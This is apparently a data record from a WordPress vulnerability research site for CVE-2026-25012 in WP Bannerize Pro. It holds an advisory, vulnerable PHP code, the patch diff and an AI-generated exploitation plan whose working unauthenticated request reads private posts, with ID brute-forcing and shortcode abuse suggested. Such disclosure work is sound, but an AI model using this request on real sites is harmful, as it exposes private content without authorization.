[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXyaFGwOiNb6ZctF2_NHCupmHglSyqYuffQaA0gZ0yjo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-25012","bannerize-pro-missing-authorization","Bannerize Pro \u003C= 1.11.0 - Missing Authorization","The WP Bannerize Pro plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.11.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wp-bannerize-pro",null,"\u003C=1.11.0","1.11.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-25 00:00:00","2026-02-02 20:40:48",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fece6c07c-ea99-43f6-a8b7-f610e8db746e?source=api-prod",9,[22,23,24,25],"config\u002Fplugin.php","plugin\u002FProviders\u002FWPBannerizeFrontendServiceProvider.php","readme.txt","wp-bannerize.php","researched",false,3,"# Exploitation Research Plan: WP Bannerize Pro \u003C= 1.11.0 - Missing Authorization (CVE-2026-25012)\n\n## 1. Vulnerability Summary\nThe **WP Bannerize Pro** plugin (versions up to and including 1.11.0) contains a missing authorization vulnerability within its frontend request handling logic. The `WPBannerizeFrontendServiceProvider` class registers a `wp_loaded` hook that processes requests starting with a specific URI prefix (`\u002Fwp_bannerize_pro?`). \n\nThis handler retrieves any WordPress post by an ID provided in the query string and executes `do_shortcode()` on its content without verifying the post's status (e.g., whether it is private, a draft, or a password-protected post) or checking if the current user has the authority to view that content. This allows unauthenticated attackers to render the content and evaluate shortcodes of any post on the site, leading to unauthorized access to potentially sensitive information or execution of shortcode-based actions.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `http:\u002F\u002F\u003Ctarget-site>\u002Fwp_bannerize_pro?id=\u003CPOST_ID>`\n- **HTTP Method**: `GET`\n- **Authentication**: None (Unauthenticated)\n- **Parameters**: \n    - `id`: The integer ID of the target post, page, or banner to render.\n- **Condition**: The `REQUEST_URI` must start exactly with `\u002Fwp_bannerize_pro?`.\n- **Preconditions**: \n    - The plugin must be active.\n    - The site must be installed at the root of the domain (due to the `substr($requestUri, 0, 18)` check).\n\n## 3. Code Flow\nThe vulnerability is located in `plugin\u002FProviders\u002FWPBannerizeFrontendServiceProvider.php`.\n\n1. **Registration**: The `register()` method hooks `wp_loaded`:\n   ```php\n   add_action('wp_loaded', [$this, 'wp_loaded'], 99);\n   ```\n\n2. **Entry Point**: The `wp_loaded()` method triggers early in the WordPress lifecycle:\n   ```php\n   public function wp_loaded()\n   {\n     $requestMethod = $_SERVER['REQUEST_METHOD'] ?? '';\n     $requestUri = $_SERVER['REQUEST_URI'] ?? '';\n     $queryString = $_SERVER['QUERY_STRING'] ?? '';\n\n     \u002F\u002F Vulnerable check: Only checks URI prefix, not permissions\n     if (strtolower($requestMethod) === 'get' && substr($requestUri, 0, 18) === '\u002Fwp_bannerize_pro?') {\n       $queryParams = [];\n       parse_str($queryString, $queryParams);\n\n       if (isset($queryParams['id']) && !empty($queryParams['id'])) {\n         \u002F\u002F Sink: Retrieves any post regardless of visibility settings\n         $post = get_post($queryParams['id']); ?>\n         \u003C!DOCTYPE html>\n         \u003Chtml>\n         \u003Cbody>\n           \u003C?php \n           \u002F\u002F Sink: Executes shortcodes on content\n           echo do_shortcode($post->post_content); \n           ?>\n         \u003C\u002Fbody>\n         \u003C\u002Fhtml>\n         \u003C?php die();\n       }\n     }\n   }\n   ```\n\n## 4. Nonce Acquisition Strategy\nThis specific vulnerability in the `wp_loaded` hook **does not require a nonce**. The code checks the `REQUEST_METHOD` and `REQUEST_URI` but does not invoke `wp_verify_nonce()` or `check_admin_referer()`.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate that an unauthenticated user can read the content of a \"Private\" post by bypassing standard authorization.\n\n1. **Discovery**: Use the `http_request` tool to check if the endpoint responds.\n2. **Payload Construction**: Target a known post ID or brute-force IDs to find a private post.\n3. **Execution**:\n    - **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp_bannerize_pro?id=\u003CTARGET_ID>`\n    - **Header**: `Accept: text\u002Fhtml`\n4. **Analysis**: Check the response body for rendered shortcodes or content that should not be visible to unauthenticated users.\n\n## 6. Test Data Setup\nTo verify the vulnerability, we need to create content that is normally restricted:\n1. **Create a Private Post**:\n   ```bash\n   wp post create --post_type=post --post_title=\"Secret Report\" --post_content=\"CONFIDENTIAL_DATA_12345 [wp_bannerize_pro id=1]\" --post_status=private\n   ```\n2. **Note the ID**: Capture the ID returned by the `wp post create` command.\n3. **Create a Banner (Optional)**: If testing specifically for banner rendering:\n   ```bash\n   wp post create --post_type=wp_bannerize --post_title=\"Hidden Banner\" --post_content=\"BANNER_CONTENT_ABCDE\" --post_status=publish\n   ```\n\n## 7. Expected Results\n- When accessing the standard post URL (e.g., `\u002F?p=\u003CID>`), an unauthenticated user should receive a 404 or redirect to login.\n- When accessing `\u002Fwp_bannerize_pro?id=\u003CID>`, the plugin should return an HTML document containing:\n    - The string `CONFIDENTIAL_DATA_12345`.\n    - The evaluated output of any shortcodes present in the post content.\n\n## 8. Verification Steps\n1. **Initial State**: confirm the post is private.\n   ```bash\n   wp post get \u003CID> --field=post_status\n   # Expected: private\n   ```\n2. **Exploit Request**: Use the `http_request` tool.\n   ```javascript\n   await http_request({\n     url: \"http:\u002F\u002Flocalhost:8080\u002Fwp_bannerize_pro?id=\u003CID>\",\n     method: \"GET\"\n   });\n   ```\n3. **Confirmation**: Search the response for the secret string.\n   ```javascript\n   if (response.body.includes(\"CONFIDENTIAL_DATA_12345\")) {\n     console.log(\"Vulnerability Confirmed: Unauthenticated access to private post content.\");\n   }\n   ```\n\n## 9. Alternative Approaches\nIf the site is installed in a subdirectory (e.g., `\u002Fwordpress\u002F`), the `substr($requestUri, 0, 18)` check will fail because the URI will start with `\u002Fwordpress\u002Fwp_bannerize_pro?`.\n\nIn such a case, exploitation might be possible if:\n1. The attacker can trigger a request where the `REQUEST_URI` is manipulated (though rare in standard environments).\n2. The site is behind a proxy that strips the subdirectory prefix before it reaches PHP.\n\nIf the primary goal is to trigger \"Unauthorized Actions\" as suggested by the severity, we can look for shortcodes installed on the system (e.g., from other plugins) that perform state changes (like `[contact-form-7]` triggers or `[user_registration_form]`) and execute them by providing the ID of the post containing them.","The WP Bannerize Pro plugin for WordPress is vulnerable to unauthorized information disclosure and shortcode execution due to a missing authorization check in the `wp_loaded` hook. Unauthenticated attackers can access the content of any post, including private or password-protected posts, and trigger shortcode processing by navigating to a specific URI with a target post ID.","\u002F\u002F plugin\u002FProviders\u002FWPBannerizeFrontendServiceProvider.php:178\n  public function wp_loaded()\n  {\n    $requestMethod = $_SERVER['REQUEST_METHOD'] ?? '';\n    $requestUri = $_SERVER['REQUEST_URI'] ?? '';\n    $queryString = $_SERVER['QUERY_STRING'] ?? '';\n\n    if (strtolower($requestMethod) === 'get' && substr($requestUri, 0, 18) === '\u002Fwp_bannerize_pro?') {\n      $queryParams = [];\n      parse_str($queryString, $queryParams);\n\n      if (isset($queryParams['id']) && !empty($queryParams['id'])) {\n        $post = get_post($queryParams['id']); ?>\n        \u003C!DOCTYPE html>\n        \u003Chtml>\n\n        \u003Cbody>\n          \u003C?php echo do_shortcode($post->post_content); ?>\n        \u003C\u002Fbody>\n\n        \u003C\u002Fhtml>\n\u003C?php die();\n      }\n    }\n  }","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-bannerize-pro\u002F1.11.0\u002Fplugin\u002FProviders\u002FWPBannerizeFrontendServiceProvider.php\t2025-08-25 09:32:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-bannerize-pro\u002F1.11.1\u002Fplugin\u002FProviders\u002FWPBannerizeFrontendServiceProvider.php\t2026-01-20 09:05:32.000000000 +0000\n@@ -184,7 +186,16 @@\n       parse_str($queryString, $queryParams);\n \n       if (isset($queryParams['id']) && !empty($queryParams['id'])) {\n-\t$post = get_post($queryParams['id']); ?>\n+\n+        $post = get_post($queryParams['id']);\n+\n+        $is_private = $post->post_status !== 'publish';\n+        $is_password_protected = post_password_required($post->ID);\n+\n+        if ($is_private || $is_password_protected) {\n+          return;\n+        }\n+        ?>\n         \u003C!DOCTYPE html>\n         \u003Chtml>","An attacker can exploit this vulnerability by sending a GET request to the site's root using the URI pattern `\u002Fwp_bannerize_pro?id=[POST_ID]`. Because the plugin processes this request during the `wp_loaded` action without verifying if the post is public or if the requester has permission to view it, the server will respond with the processed content (including any executed shortcodes) of the post associated with the provided ID. No authentication or nonces are required for this attack.","gemini-3-flash-preview","2026-05-05 00:21:17","2026-05-05 00:21:51",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.11.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-bannerize-pro\u002Ftags\u002F1.11.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-bannerize-pro.1.11.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-bannerize-pro\u002Ftags\u002F1.11.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-bannerize-pro.1.11.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-bannerize-pro\u002Ftags"]